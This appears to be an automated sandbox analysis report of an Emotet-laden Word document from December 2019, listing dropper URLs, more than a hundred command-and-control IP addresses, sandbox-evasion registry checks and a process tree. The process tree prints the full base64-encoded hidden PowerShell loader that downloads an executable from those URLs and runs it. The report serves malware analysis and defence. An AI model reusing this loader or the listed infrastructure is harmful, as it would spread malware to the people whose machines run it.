Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
10-12-2019 17:09
General
Malware Config
Extracted
https://www.cigpcl.com/wp-admin/9674/
http://blog.380degre.com/wp-admin/xk8/
https://bestmusicafrica.com/cgi-bin/g336/
http://event.narailvolunteers.org/wp-admin/e12153/
http://ljterrace.com/fmjiet/j6uv75/
Extracted
emotet
85.152.208.146:80
68.174.15.223:80
2.42.173.240:80
96.126.121.64:443
104.236.137.72:8080
172.104.233.225:8080
85.234.143.94:8080
45.79.95.107:443
77.55.211.77:8080
188.14.39.65:443
83.165.163.225:80
185.160.212.3:80
109.169.86.13:8080
68.183.190.199:8080
119.59.124.163:8080
178.79.163.131:8080
87.118.70.69:8080
91.83.93.124:7080
77.241.53.234:80
109.166.89.91:80
63.246.252.234:80
190.146.131.105:8080
190.210.184.138:995
37.183.121.32:80
116.48.138.115:80
190.4.50.26:80
104.33.129.244:80
191.103.76.34:443
201.213.32.59:80
212.71.237.140:8080
172.90.70.168:8080
47.146.42.234:80
185.86.148.222:8080
68.183.170.114:8080
87.106.46.107:8080
58.171.181.213:80
142.127.57.63:8080
207.154.204.40:8080
159.203.204.126:8080
217.199.160.224:8080
82.196.15.205:8080
5.88.27.67:8080
142.93.114.137:8080
91.204.163.19:8090
45.50.177.164:80
200.124.225.32:80
181.36.42.205:443
130.45.45.31:80
149.135.123.65:80
80.85.87.122:8080
144.2.165.179:80
190.186.164.23:80
118.200.218.193:443
87.106.77.40:7080
73.167.135.180:80
5.196.35.138:7080
97.81.12.153:80
96.61.113.203:80
181.231.62.54:80
95.179.195.74:80
183.82.97.25:80
186.15.83.52:8080
163.172.40.218:7080
200.58.83.179:80
62.75.143.100:7080
46.101.212.195:8080
62.75.160.178:8080
203.130.0.69:80
93.67.154.252:443
72.29.55.174:80
200.123.101.90:80
181.61.143.177:80
203.25.159.3:8080
125.99.61.162:7080
69.163.33.84:8080
138.68.106.4:7080
2.139.158.136:443
104.131.58.132:8080
181.198.203.45:443
144.139.56.105:80
184.184.202.167:443
14.160.93.230:80
79.31.85.103:80
201.190.133.235:8080
2.44.167.52:80
188.216.24.204:80
86.42.166.147:80
190.38.14.52:80
76.221.133.146:80
68.129.203.162:443
202.186.240.165:8080
190.97.30.167:990
50.28.51.143:8080
149.62.173.247:8080
200.119.11.118:443
134.209.214.126:8080
139.5.237.27:443
118.36.70.245:80
82.8.232.51:80
181.135.153.203:443
51.255.165.160:8080
91.205.215.57:7080
190.102.226.91:80
186.68.48.204:443
46.28.111.142:7080
190.195.129.227:8090
204.63.252.182:443
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\413.exe => C:\Windows\SysWOW64\publishchar.exe 413.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4924 WINWORD.EXE 4656 413.exe 3708 413.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4528 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4528 Powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4656 413.exe 3708 413.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4924 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4924 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4440 wrote to memory of 3084 4440 SppExtComObj.exe 76 PID 4528 wrote to memory of 4656 4528 Powershell.exe 80 PID 4656 wrote to memory of 3708 4656 413.exe 81 -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3708 413.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\585307062aaa4f62202ad9d974146773038ed2e3a8f75b14a3e27c1b5fc4f5f1.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:4924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAHkAZgBwAHQAagBvAGYAcQBwAD0AJwBDAGUAeQB0AGsAYgBpAHYAYgAnADsAJABUAGMAbQByAHQAYgBwAGsAdwBnAGoAIAA9ACAAJwA0ADEAMwAnADsAJABHAGkAcwBiAGYAawB1AHQAcQA9ACcATwBqAHcAYwBuAG4AaQBkAG0AbwBqAHEAJwA7ACQAUwBsAGgAbgBwAG0AdwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUAGMAbQByAHQAYgBwAGsAdwBnAGoAKwAnAC4AZQB4AGUAJwA7ACQAUgBsAGYAYgBnAGsAZQBhAGEAagBsAD0AJwBBAGYAdgBkAHIAZABsAGoAawBvACcAOwAkAFIAaABuAGEAdAB0AGQAbwB6AGIAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBFAGIAYwBsAEkAZQBOAFQAOwAkAFcAbgB2AGQAZgB1AHcAcQBhAGEAbwBsAGwAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAaQBnAHAAYwBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA5ADYANwA0AC8AKgBoAHQAdABwADoALwAvAGIAbABvAGcALgAzADgAMABkAGUAZwByAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHgAawA4AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBlAHMAdABtAHUAcwBpAGMAYQBmAHIAaQBjAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnADMAMwA2AC8AKgBoAHQAdABwADoALwAvAGUAdgBlAG4AdAAuAG4AYQByAGEAaQBsAHYAbwBsAHUAbgB0AGUAZQByAHMALgBvAHIAZwAvAHcAcAAtAGEAZABtAGkAbgAvAGUAMQAyADEANQAzAC8AKgBoAHQAdABwADoALwAvAGwAagB0AGUAcgByAGEAYwBlAC4AYwBvAG0ALwBmAG0AagBpAGUAdAAvAGoANgB1AHYANwA1AC8AJwAuACIAcwBQAGAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAcwBoAGwAcQB3AHIAdQBrAG4AeQBvAD0AJwBQAG8AbgBpAG0AcgB3AGEAaQB4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGUAeABwAGQAYQByAHgAYgB1AHEAcABnACAAaQBuACAAJABXAG4AdgBkAGYAdQB3AHEAYQBhAG8AbABsACkAewB0AHIAeQB7ACQAUgBoAG4AYQB0AHQAZABvAHoAYgAuACIARABvAHcAbgBMAGAAbwBBAGAARABGAEkAYABsAGUAIgAoACQAWABlAHgAcABkAGEAcgB4AGIAdQBxAHAAZwAsACAAJABTAGwAaABuAHAAbQB3AHcAKQA7ACQAUwBuAG0AaABnAHgAZwBnAHoAcgA9ACcASwBtAHQAdwBjAG0AaABnAGwAZwBvACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUwBsAGgAbgBwAG0AdwB3ACkALgAiAEwAYABFAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA3ADUAMgAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgBUACIAKAAkAFMAbABoAG4AcABtAHcAdwApADsAJABCAGcAeQBnAGsAawB1AGYAPQAnAEgAZABoAGIAaQBtAGwAeAByACcAOwBiAHIAZQBhAGsAOwAkAEEAeAB6AHkAdwBxAGsAYQBsAHkAcABsAGYAPQAnAEgAcwBoAG0AdQBlAGkAcABwAHoAZgBmAHkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBlAHcAYwBhAGkAegBpAG4AdQBqAGYAdAA9ACcAUgBiAGYAaQBlAHMAcQBmAGUAdAByAGkAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\413.exe"C:\Users\Admin\413.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\413.exe--530387d43⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:3708
-
-